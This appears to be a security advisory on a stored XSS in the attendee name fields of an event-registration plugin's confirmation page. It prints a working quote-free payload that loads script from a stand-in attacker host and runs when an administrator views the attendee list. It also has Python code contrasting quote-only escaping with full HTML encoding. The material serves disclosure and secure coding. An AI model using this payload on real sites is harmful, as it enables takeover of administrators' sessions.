There is a persistent (stored) XSS in the attendee's first name and last name fields on the registration confirmation page (evr_public-process_confirmation.php). Quotes are escaped, but the following vector, which contains no quotes at all, still succeeds and is executed e.g. in Firefox and Chrome:

<script src=http://evil.example.com/evil.js></script>

When injected as first name or last name on the attendee's registration confirmation page (step 2 of the attendee's default registration process), the script is stored with the attendee record and is loaded as soon as a backend user views the list of attendees.
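To make the failure mode concrete, here is an added example (not code from the plugin or from the original report) that models the weak filter and its hardened replacement. It assumes the vulnerable code neutralises only the quote characters before rendering the attendee list; the function names, the attendee-row markup and the sample values are constructed for illustration. The point it shows is that a quote-only filter is no defence in an HTML text context: the vector above has no quotes, so it passes through untouched, while full HTML entity encoding of the untrusted value renders it inert.

```python
import html

# Constructed payload: the quote-free vector from the report.
PAYLOAD = "<script src=http://evil.example.com/evil.js></script>"


def escape_quotes_only(value: str) -> str:
    """Model of the weak filter (assumption): only quote characters are touched.
    Everything else, including '<' and '>', is passed through verbatim."""
    return value.replace('"', "&quot;").replace("'", "&#039;")


def escape_html(value: str) -> str:
    """Hardened output encoding for an HTML text context:
    encodes '&', '<', '>', '"' and "'" so the browser never sees a tag."""
    return html.escape(value, quote=True)


def render_attendee_row(first: str, last: str, escape) -> str:
    """Render one row of the backend attendee list with the given encoder.
    The markup is a constructed stand-in for the plugin's own template."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(escape(first), escape(last))


def contains_raw_script_tag(rendered: str) -> bool:
    """Crude detection check: an unencoded '<script' in the rendered HTML means
    attacker markup reached the page and will execute in the admin's browser."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    weak = render_attendee_row(PAYLOAD, "Doe", escape_quotes_only)
    hardened = render_attendee_row(PAYLOAD, "Doe", escape_html)
    print("quote-only filter :", weak)
    print("  script survives :", contains_raw_script_tag(weak))
    print("html entity encode:", hardened)
    print("  script survives :", contains_raw_script_tag(hardened))
```

The check is deliberately crude (it only looks for a literal `<script`); it is there to make the difference between the two encoders visible, not to serve as a filter. The fix is the encoder itself: encode every untrusted value for the context it is written into, at output time, rather than stripping a handful of characters at input time.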

A demonstration of the XSS issues can be found here: https://www.youtube.com/watch?v=N4eaCAhk-a0